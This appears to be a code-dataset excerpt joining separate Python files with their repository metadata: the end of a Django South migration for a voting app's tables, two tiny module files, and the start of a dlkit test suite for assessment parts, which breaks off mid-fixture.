('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('voting', models.ForeignKey(orm[u'voting.voting'], null=False)),
('proposalset', models.ForeignKey(orm[u'proposals.proposalset'], null=False))
))
db.create_unique(m2m_table_name, ['voting_id', 'proposalset_id'])
# Adding M2M table for field proposals on 'Voting'
m2m_table_name = db.shorten_name(u'voting_voting_proposals')
db.create_table(m2m_table_name, (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('voting', models.ForeignKey(orm[u'voting.voting'], null=False)),
('proposal', models.ForeignKey(orm[u'proposals.proposal'], null=False))
))
db.create_unique(m2m_table_name, ['voting_id', 'proposal_id'])
# Adding model 'ConfirmVote'
db.create_table(u'voting_confirmvote', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('proposal', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['proposals.Proposal'], null=True, blank=True)),
('token', self.gf('django.db.models.fields.CharField')(max_length=32, null=True, blank=True)),
('requested_on', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
))
db.send_create_signal(u'voting', ['ConfirmVote'])
def backwards(self, orm):
# Deleting model 'Poll'
db.delete_table(u'voting_poll')
# Removing M2M table for field participants on 'Poll'
db.delete_table(db.shorten_name(u'voting_poll_participants'))
# Deleting model 'Choice'
db.delete_table(u'voting_choice')
# Removing M2M table for field votes on 'Choice'
db.delete_table(db.shorten_name(u'voting_choice_votes'))
# Deleting model 'Voting'
db.delete_table(u'voting_voting')
# Removing M2M table for field proposalsets on 'Voting'
db.delete_table(db.shorten_name(u'voting_voting_proposalsets'))
# Removing M2M table for field proposals on 'Voting'
db.delete_table(db.shorten_name(u'voting_voting_proposals'))
# Deleting model 'ConfirmVote'
db.delete_table(u'voting_confirmvote')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'debate.debate': {
'Meta': {'object_name': 'Debate'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['spaces.Space']", 'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'theme': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
},
u'proposals.proposal': {
'Meta': {'object_name': 'Proposal'},
'anon_allowed': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'proposal_authors'", 'null': 'True', 'to': u"orm['auth.User']"}),
'budget': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'close_reason': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'closed': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'closed_by': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'proposal_closed_by'", 'null': 'True', 'to': u"orm['auth.User']"}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'max_length': '300'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '17', 'decimal_places': '15', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '17', 'decimal_places': '15', 'blank': 'True'}),
'merged': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'merged_proposals': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'merged_proposals_rel_+'", 'null': 'True', 'to': u"orm['proposals.Proposal']"}),
'mod_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'object_pk': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'proposalset': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'proposal_in'", 'null': 'True', 'to': u"orm['proposals.ProposalSet']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'refurbished': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['spaces.Space']", 'null': 'True', 'blank': 'True'}),
'support_votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'support_votes'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"}),
'tags': ('apps.thirdparty.tagging.fields.TagField', [], {'max_length': '255', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'voting_votes'", 'null': 'True', 'symmetrical': 'False', 'to': u"orm['auth.User']"})
},
u'proposals.proposalset': {
'Meta': {'object_name': 'ProposalSet'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'debate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['debate.Debate']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['spaces.Space']", 'null': 'True', 'blank': 'True'})
},
u'spaces.space': {
'Meta': {'ordering': "['name']", 'object_name': 'Space'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'banner': ('core.spaces.fields.StdImageField', [], {'max_length': '100'}),
'description': ('django.db.models.fields.TextField', [], {'default': "u'Write here your description.'"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('core.spaces.fields.StdImageField', [], {'max_length': '100'}),
'mod_cal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mod_debate': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mod_docs': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mod_news': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mod_proposals': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mod_voting': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'url': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'})
},
u'voting.choice': {
'Meta': {'object_name': 'Choice'},
'choice_text': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'poll': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['voting.Poll']"}),
'votes': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'voting.confirmvote': {
'Meta': {'object_name': 'ConfirmVote'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'proposal': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['proposals.Proposal']", 'null': 'True', 'blank': 'True'}),
'requested_on': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'})
},
u'voting.poll': {
'Meta': {'object_name': 'Poll'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'poll-author'", 'null': 'True', 'to': u"orm['auth.User']"}),
'end_date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'poll_lastup': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'poll_tags': ('apps.thirdparty.tagging.fields.TagField', [], {'max_length': '255', 'blank': 'True'}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'question': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['spaces.Space']", 'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {})
},
u'voting.voting': {
'Meta': {'object_name': 'Voting'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_votes': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'ponderation': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'proposals': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['proposals.Proposal']", 'null': 'True', 'blank': 'True'}),
'proposalsets': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['proposals.ProposalSet']", 'null': 'True', 'blank': 'True'}),
'space': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['spaces.Space']", 'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'})
}
}
complete_apps = ['voting'] | 76.589744 | 206 | 0.584437 | 2,358 | 20,909 | 5.063189 | 0.075488 | 0.09113 | 0.158305 | 0.22615 | 0.856269 | 0.81238 | 0.796968 | 0.727867 | 0.678951 | 0.615629 | 0 | 0.00697 | 0.183462 | 20,909 | 273 | 207 | 76.589744 | 0.692321 | 0.029222 | 0 | 0.25641 | 0 | 0 | 0.518318 | 0.283714 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008547 | false | 0.004274 | 0.017094 | 0 | 0.038462 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
49d22315db77afc15407a1db939be43dd499564a | 32 | py | Python | suspect/viz/__init__.py | hjiang1/suspect | f8b320b16bbd73a95d58eea1660921d6cad16f36 | [
"MIT"
] | 16 | 2016-08-31T21:05:06.000Z | 2022-02-06T12:48:33.000Z | suspect/viz/__init__.py | hjiang1/suspect | f8b320b16bbd73a95d58eea1660921d6cad16f36 | [
"MIT"
] | 141 | 2016-07-28T21:34:17.000Z | 2022-03-30T09:00:36.000Z | suspect/viz/__init__.py | hjiang1/suspect | f8b320b16bbd73a95d58eea1660921d6cad16f36 | [
"MIT"
] | 21 | 2016-08-04T14:54:19.000Z | 2022-03-29T16:04:08.000Z | from . import plot_1D_signals
| 8 | 29 | 0.78125 | 5 | 32 | 4.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0.1875 | 32 | 3 | 30 | 10.666667 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
49ee70309b66c9f5b11956f279d1b99c5a51c162 | 114 | py | Python | tests/context.py | Mukhopadhyay/restdf | adeb6c188a20ecd9ee7eeafc12111e260072777e | [
"MIT"
] | 3 | 2021-11-07T10:12:48.000Z | 2021-11-11T07:06:25.000Z | tests/context.py | Mukhopadhyay/restdf | adeb6c188a20ecd9ee7eeafc12111e260072777e | [
"MIT"
] | null | null | null | tests/context.py | Mukhopadhyay/restdf | adeb6c188a20ecd9ee7eeafc12111e260072777e | [
"MIT"
] | null | null | null | import sys
from os.path import abspath, join, dirname
sys.path.insert(0, abspath(join(dirname(__file__), '..')))
| 22.8 | 58 | 0.72807 | 17 | 114 | 4.647059 | 0.647059 | 0.278481 | 0.455696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009804 | 0.105263 | 114 | 4 | 59 | 28.5 | 0.764706 | 0 | 0 | 0 | 0 | 0 | 0.017544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
49fae9e3eeb7c5ea7d66c3188cd7ff9473e82e85 | 37,517 | py | Python | tests/assessment_authoring/test_objects.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 2 | 2018-02-23T12:16:11.000Z | 2020-10-08T17:54:24.000Z | tests/assessment_authoring/test_objects.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 87 | 2017-04-21T18:57:15.000Z | 2021-12-13T19:43:57.000Z | tests/assessment_authoring/test_objects.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | [
"MIT"
] | 1 | 2018-03-01T16:44:25.000Z | 2018-03-01T16:44:25.000Z | """Unit tests of assessment.authoring objects."""
import pytest
from ..utilities.general import is_never_authz, is_no_authz, uses_cataloging, uses_filesystem_only
from dlkit.abstract_osid.assessment.objects import Assessment
from dlkit.abstract_osid.assessment_authoring import objects as ABCObjects
from dlkit.abstract_osid.assessment_authoring.objects import AssessmentPart
from dlkit.abstract_osid.id.primitives import Id as ABC_Id
from dlkit.abstract_osid.locale.primitives import DisplayText as ABC_DisplayText
from dlkit.abstract_osid.osid import errors
from dlkit.json_.id.objects import IdList
from dlkit.json_.osid.metadata import Metadata
from dlkit.primordium.calendaring.primitives import DateTime, Duration
from dlkit.primordium.id.primitives import Id
from dlkit.primordium.type.primitives import Type
from dlkit.runtime import PROXY_SESSION, proxy_example
from dlkit.runtime.managers import Runtime
SIMPLE_SEQUENCE_RECORD_TYPE = Type(**{"authority": "ODL.MIT.EDU", "namespace": "osid-object", "identifier": "simple-child-sequencing"})
REQUEST = proxy_example.SimpleRequest()
CONDITION = PROXY_SESSION.get_proxy_condition()
CONDITION.set_http_request(REQUEST)
PROXY = PROXY_SESSION.get_proxy(CONDITION)
DEFAULT_TYPE = Type(**{'identifier': 'DEFAULT', 'namespace': 'DEFAULT', 'authority': 'DEFAULT'})
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def assessment_part_class_fixture(request):
request.cls.service_config = request.param
request.cls.assessment_part_list = list()
request.cls.assessment_part_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_bank_form_for_create([])
create_form.display_name = 'Test Bank'
create_form.description = 'Test Bank for AssessmentPart tests'
request.cls.catalog = request.cls.svc_mgr.create_bank(create_form)
assessment_form = request.cls.catalog.get_assessment_form_for_create([])
assessment_form.display_name = 'Test Assessment'
assessment_form.description = 'Test Assessment for AssessmentPart tests'
request.cls.assessment = request.cls.catalog.create_assessment(assessment_form)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.catalog.use_unsequestered_assessment_part_view()
request.cls.catalog.delete_assessment(request.cls.assessment.ident)
request.cls.svc_mgr.delete_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def assessment_part_test_fixture(request):
if not is_never_authz(request.cls.service_config):
form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident,
[])
request.cls.object = request.cls.catalog.create_assessment_part_for_assessment(form)
request.cls.assessment = request.cls.catalog.get_assessment(request.cls.assessment.ident)
def test_tear_down():
if not is_never_authz(request.cls.service_config):
for assessment_part in request.cls.catalog.get_assessment_parts_for_assessment(request.cls.assessment.ident):
if assessment_part.has_children():
for child_id in assessment_part.get_child_ids():
try:
request.cls.catalog.delete_assessment_part(child_id)
except errors.NotFound:
pass
request.cls.catalog.delete_assessment_part(assessment_part.ident)
request.addfinalizer(test_tear_down)
@pytest.mark.usefixtures("assessment_part_class_fixture", "assessment_part_test_fixture")
class TestAssessmentPart(object):
"""Tests for AssessmentPart"""
def test_get_assessment_id(self):
"""Tests get_assessment_id"""
if not is_never_authz(self.service_config):
result_id = self.object.get_assessment_id()
assert isinstance(result_id, Id)
assert str(result_id) == str(self.assessment.ident)
def test_get_assessment(self):
"""Tests get_assessment"""
if not is_never_authz(self.service_config):
result = self.object.get_assessment()
assert isinstance(result, Assessment)
assert str(result.ident) == str(self.assessment.ident)
def test_has_parent_part(self):
"""Tests has_parent_part"""
if not is_never_authz(self.service_config):
assert isinstance(self.object.has_parent_part(), bool)
def test_get_assessment_part_id(self):
"""Tests get_assessment_part_id"""
if not is_never_authz(self.service_config):
with pytest.raises(errors.IllegalState):
self.object.get_assessment_part_id()
def test_get_assessment_part(self):
"""Tests get_assessment_part"""
if not is_never_authz(self.service_config):
with pytest.raises(errors.IllegalState):
self.object.get_assessment_part()
def test_is_section(self):
"""Tests is_section"""
# From test_templates/resources.py::Resource::is_group_template
if not is_never_authz(self.service_config):
assert isinstance(self.object.is_section(), bool)
def test_get_weight(self):
"""Tests get_weight"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.get_weight()
def test_get_allocated_time(self):
"""Tests get_allocated_time"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.get_allocated_time()
def test_get_child_assessment_part_ids(self):
"""Tests get_child_assessment_part_ids"""
if not is_never_authz(self.service_config):
with pytest.raises(errors.IllegalState):
self.object.get_child_assessment_part_ids()
# to get these back, need to have a simple sequencing part as the parent
form = self.catalog.get_assessment_part_form_for_create_for_assessment(self.assessment.ident,
[SIMPLE_SEQUENCE_RECORD_TYPE])
form.set_children([Id('assessment.Part%3A000000000000000000000000%40ODL.MIT.EDU')])
parent_part = self.catalog.create_assessment_part_for_assessment(form)
results = parent_part.get_child_assessment_part_ids()
assert isinstance(results, IdList)
assert results.available() == 1
assert str(results.next()) == 'assessment.Part%3A000000000000000000000000%40ODL.MIT.EDU'
def test_get_child_assessment_parts(self):
"""Tests get_child_assessment_parts"""
if not is_never_authz(self.service_config):
with pytest.raises(errors.IllegalState):
self.object.get_child_assessment_parts()
# to get these back, need to have a simple sequencing part as the parent
form = self.catalog.get_assessment_part_form_for_create_for_assessment(self.assessment.ident,
[SIMPLE_SEQUENCE_RECORD_TYPE])
parent_part = self.catalog.create_assessment_part_for_assessment(form)
form = self.catalog.get_assessment_part_form_for_create_for_assessment_part(parent_part.ident,
[])
child_part = self.catalog.create_assessment_part_for_assessment(form)
parent_part = self.catalog.get_assessment_part(parent_part.ident)
results = parent_part.get_child_assessment_part_ids()
assert isinstance(results, IdList)
assert results.available() == 1
assert str(results.next()) == str(child_part.ident)
def test_get_assessment_part_record(self):
"""Tests get_assessment_part_record"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unsupported):
self.object.get_assessment_part_record(True)
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def assessment_part_form_class_fixture(request):
request.cls.service_config = request.param
request.cls.assessment_part_list = list()
request.cls.assessment_part_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_bank_form_for_create([])
create_form.display_name = 'Test Bank'
create_form.description = 'Test Bank for AssessmentPartForm tests'
request.cls.catalog = request.cls.svc_mgr.create_bank(create_form)
assessment_form = request.cls.catalog.get_assessment_form_for_create([])
assessment_form.display_name = 'Test Assessment'
assessment_form.description = 'Test Assessment for AssessmentPartForm tests'
request.cls.assessment = request.cls.catalog.create_assessment(assessment_form)
def class_tear_down():
if not is_never_authz(request.cls.service_config):
request.cls.catalog.use_unsequestered_assessment_part_view()
request.cls.catalog.delete_assessment(request.cls.assessment.ident)
request.cls.svc_mgr.delete_bank(request.cls.catalog.ident)
request.addfinalizer(class_tear_down)
@pytest.fixture(scope="function")
def assessment_part_form_test_fixture(request):
if not is_never_authz(request.cls.service_config):
request.cls.form = request.cls.catalog.get_assessment_part_form_for_create_for_assessment(request.cls.assessment.ident,
[])
request.cls.object = request.cls.form
request.cls.assessment = request.cls.catalog.get_assessment(request.cls.assessment.ident)
@pytest.mark.usefixtures("assessment_part_form_class_fixture", "assessment_part_form_test_fixture")
class TestAssessmentPartForm(object):
"""Tests for AssessmentPartForm"""
def test_get_weight_metadata(self):
"""Tests get_weight_metadata"""
# From test_templates/resource.py::ResourceForm::get_group_metadata_template
if not is_never_authz(self.service_config):
mdata = self.form.get_weight_metadata()
assert isinstance(mdata, Metadata)
assert isinstance(mdata.get_element_id(), ABC_Id)
assert isinstance(mdata.get_element_label(), ABC_DisplayText)
assert isinstance(mdata.get_instructions(), ABC_DisplayText)
assert mdata.get_syntax() == 'CARDINAL'
assert not mdata.is_array()
assert isinstance(mdata.is_required(), bool)
assert isinstance(mdata.is_read_only(), bool)
assert isinstance(mdata.is_linked(), bool)
def test_set_weight(self):
"""Tests set_weight"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
elif uses_cataloging(self.service_config):
pass # cannot call the _get_record() methods on catalogs
else:
with pytest.raises(errors.Unimplemented):
self.object.set_weight(True)
def test_clear_weight(self):
"""Tests clear_weight"""
if is_never_authz(self.service_config):
pass # no object to call the method on?
else:
with pytest.raises(errors.Unimplemented):
self.object.clear_weight()
def test_get_allocated_time_metadata(self):
"""Tests get_allocated_time_metadata"""
# From test_templates/resource.py::ResourceForm::get_group_metadata_template
if not is_never_authz(self.service_config):
mdata = self.form.get_allocated_time_metadata()
assert isinstance(mdata, Metadata)
assert isinstance(mdata.get_element_id(), ABC_Id)
assert isinstance(mdata.get_element_label(), ABC_DisplayText)
assert isinstance(mdata.get_instructions(), ABC_DisplayText)
assert mdata.get_syntax() == 'DURATION'
assert not mdata.is_array()
assert isinstance(mdata.is_required(), bool)
assert isinstance(mdata.is_read_only(), bool)
assert isinstance(mdata.is_linked(), bool)
def test_set_allocated_time(self):
"""Tests set_allocated_time"""
# From test_templates/assessment.py::AssessmentOfferedForm::set_duration_template
if not is_never_authz(self.service_config):
test_duration = Duration(hours=1)
assert self.form._my_map['allocatedTime'] is None
self.form.set_allocated_time(test_duration)
assert self.form._my_map['allocatedTime']['seconds'] == 3600
assert self.form._my_map['allocatedTime']['days'] == 0
assert self.form._my_map['allocatedTime']['microseconds'] == 0
with pytest.raises(errors.InvalidArgument):
self.form.set_allocated_time(1.05)
# reset this for other tests
self.form._my_map['allocatedTime'] = None
def test_clear_allocated_time(self):
"""Tests clear_allocated_time"""
# From test_templates/assessment.py::AssessmentOfferedForm::clear_duration_template
if not is_never_authz(self.service_config):
test_duration = Duration(hours=1)
assert self.form._my_map['allocatedTime'] is None
self.form.set_allocated_time(test_duration)
assert self.form._my_map['allocatedTime']['seconds'] == 3600
assert self.form._my_map['allocatedTime']['days'] == 0
assert self.form._my_map['allocatedTime']['microseconds'] == 0
self.form.clear_allocated_time()
assert self.form._my_map['allocatedTime'] == self.form.get_allocated_time_metadata().get_default_duration_values()[0]
def test_get_assessment_part_form_record(self):
"""Tests get_assessment_part_form_record"""
if not is_never_authz(self.service_config):
with pytest.raises(errors.Unsupported):
self.form.get_assessment_part_form_record(Type('osid.Osid%3Afake-record%40ODL.MIT.EDU'))
# Here check for a real record?
@pytest.fixture(scope="class",
params=['TEST_SERVICE', 'TEST_SERVICE_ALWAYS_AUTHZ', 'TEST_SERVICE_NEVER_AUTHZ', 'TEST_SERVICE_CATALOGING', 'TEST_SERVICE_FILESYSTEM', 'TEST_SERVICE_MEMCACHE'])
def assessment_part_list_class_fixture(request):
request.cls.service_config = request.param
request.cls.assessment_part_list = list()
request.cls.assessment_part_ids = list()
request.cls.svc_mgr = Runtime().get_service_manager(
'ASSESSMENT',
proxy=PROXY,
implementation=request.cls.service_config)
if not is_never_authz(request.cls.service_config):
create_form = request.cls.svc_mgr.get_bank_form_for_create([])
create_form.display_name = 'Test Bank'
create_form.description = 'Test Bank for AssessmentPartList tests'
request.cls.catalog = request.cls.svc_mgr.create_bank(create_form)
assessment_form = request.cls.catalog.get_assessment_form_for_create([])
assessment_form.display_name = 'Test Assessment'
